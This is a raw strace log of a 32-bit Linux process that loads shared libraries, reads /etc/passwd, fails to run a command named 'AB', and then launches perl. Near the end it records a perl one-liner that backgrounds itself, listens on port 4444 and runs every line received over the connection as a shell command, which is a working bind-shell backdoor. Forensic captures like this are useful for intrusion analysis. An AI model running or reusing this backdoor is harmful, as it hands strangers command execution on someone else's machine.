\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10444 07:33:02.710806 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10444 07:33:02.710825 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da7000

10444 07:33:02.710837 mmap2(0xb7dae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dae000

10444 07:33:02.710855 close(1)          = 0

10444 07:33:02.710867 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.710881 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10444 07:33:02.710908 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10444 07:33:02.710996 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10444 07:33:02.711013 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8f000

10444 07:33:02.711028 mmap2(0xb7da3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da3000

10444 07:33:02.711043 mmap2(0xb7da5000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da5000

10444 07:33:02.711057 close(1)          = 0

10444 07:33:02.711083 munmap(0xb7f35000, 29913) = 0

10444 07:33:02.711100 open("/etc/ld.so.cache", O_RDONLY) = 1

10444 07:33:02.711113 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10444 07:33:02.711129 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

10444 07:33:02.711139 close(1)          = 0

10444 07:33:02.711150 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.711164 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10444 07:33:02.711178 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10444 07:33:02.711318 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10444 07:33:02.711337 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d85000

10444 07:33:02.711348 mmap2(0xb7d8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d8d000

10444 07:33:02.711379 close(1)          = 0

10444 07:33:02.711391 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10444 07:33:02.711404 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10444 07:33:02.711419 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10444 07:33:02.711508 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10444 07:33:02.711525 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7a000

10444 07:33:02.711536 mmap2(0xb7d83000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d83000

10444 07:33:02.711553 close(1)          = 0

10444 07:33:02.711576 munmap(0xb7f35000, 29913) = 0

10444 07:33:02.711592 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10444 07:33:02.711606 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10444 07:33:02.711618 _llseek(1, 0, [0], SEEK_CUR) = 0

10444 07:33:02.711630 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10444 07:33:02.711646 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f3c000

10444 07:33:02.711657 _llseek(1, 1624, [1624], SEEK_SET) = 0

10444 07:33:02.711672 munmap(0xb7f3c000, 1624) = 0

10444 07:33:02.711681 close(1)          = 0

10444 07:33:02.711794 getpgrp()         = 3831

10444 07:33:02.711806 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10444 07:33:02.711845 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10444 07:33:02.711862 brk(0x8101000)    = 0x8101000

10444 07:33:02.711907 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.711922 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.711936 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10444 07:33:02.711972 brk(0x8102000)    = 0x8102000

10444 07:33:02.711999 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10444 07:33:02.712018 stat64("/sbin/AB", 0xbfa38088) = -1 ENOENT (No such file or directory)

10444 07:33:02.712030 stat64("/bin/AB", 0xbfa38088) = -1 ENOENT (No such file or directory)

10444 07:33:02.712041 stat64("/usr/sbin/AB", 0xbfa38088) = -1 ENOENT (No such file or directory)

10444 07:33:02.712053 stat64("/usr/bin/AB", 0xbfa38088) = -1 ENOENT (No such file or directory)

10444 07:33:02.712065 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10444 07:33:02.712080 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db06f8) = 10445

4519  07:33:02.728554 waitpid(10444,  <unfinished ...>

10445 07:33:02.728554 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10445 07:33:02.728560 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10445 07:33:02.728574 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10445 07:33:02.728586 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10445 07:33:02.728601 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10445 07:33:02.728616 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10445 07:33:02.728629 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10445 07:33:02.728686 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10445 07:33:02.728701 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10445 07:33:02.728774 exit_group(127)   = ?

10444 07:33:02.748623 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10444 07:33:02.748623 --- SIGCHLD (Child exited) @ 0 (0) ---

10444 07:33:02.748623 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10445

10444 07:33:02.748624 waitpid(-1, 0xbfa37d08, WNOHANG) = -1 ECHILD (No child processes)

10444 07:33:02.748624 sigreturn()       = ? (mask now [])

10444 07:33:02.748624 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10444 07:33:02.748624 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10444 07:33:02.748633 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10444 07:33:02.748646 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10444 07:33:02.748664 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10444 07:33:02.748675 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10444 07:33:02.748709 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10444 07:33:02.748730 stat64("/sbin/perl", 0xbfa380b8) = -1 ENOENT (No such file or directory)

10444 07:33:02.748742 stat64("/bin/perl", 0xbfa380b8) = -1 ENOENT (No such file or directory)

10444 07:33:02.748753 stat64("/usr/sbin/perl", 0xbfa380b8) = -1 ENOENT (No such file or directory)

10444 07:33:02.748765 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10444 07:33:02.748783 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10444 07:33:02.748808 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10444 07:33:02.748822 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db06f8) = 10446

10446 07:33:02.769142 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10446 07:33:02.769262 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10446 07:33:02.769315 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10446 07:33:02.769349 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10446 07:33:02.769378 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10446 07:33:02.769404 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10446 07:33:02.769418 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10446 07:33:02.769454 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10446 07:33:02.769544 brk(0)            = 0x8153000

10446 07:33:02.769566 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10446 07:33:02.769582 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f97000

10446 07:33:02.769598 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10446 07:33:02.769615 open("/etc/ld.so.cache", O_RDONLY) = 1

10446 07:33:02.769627 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10446 07:33:02.769645 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8f000

10446 07:33:02.769655 close(1)          = 0

10446 07:33:02.769666 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10446 07:33:02.769681 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10446 07:33:02.769728 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10446 07:33:02.769837 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10446 07:33:02.769855 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8b000

10446 07:33:02.769867 mmap2(0xb7f8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f8d000

10446 07:33:02.769883 close(1)          = 0

10446 07:33:02.769895 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10446 07:33:02.769908 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

